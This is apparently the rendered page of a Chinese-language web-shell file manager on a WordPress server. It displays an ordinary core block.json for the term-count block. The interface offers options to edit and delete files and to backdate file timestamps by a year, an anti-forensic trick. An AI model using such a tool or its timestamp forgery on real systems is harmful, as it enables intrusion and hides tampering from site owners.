文件操作 - block.json
返回文件管理
返回主菜单
删除本文件
文件: /var/www/00a9a8c414a2c84b69ccb6044f0fc34f/Web/wp-includes/blocks/term-count/block.json
编辑文件内容
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/term-count", "title": "Term Count", "category": "theme", "description": "Displays the post count of a taxonomy term.", "textdomain": "default", "usesContext": [ "termId", "taxonomy" ], "attributes": { "bracketType": { "type": "string", "enum": [ "none", "round", "square", "curly", "angle" ], "default": "round" } }, "supports": { "html": false, "color": { "gradients": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "spacing": { "padding": true }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "interactivity": { "clientNavigation": true }, "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true, "__experimentalDefaultControls": { "color": true, "width": true, "style": true } } }, "style": "wp-block-term-count" }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件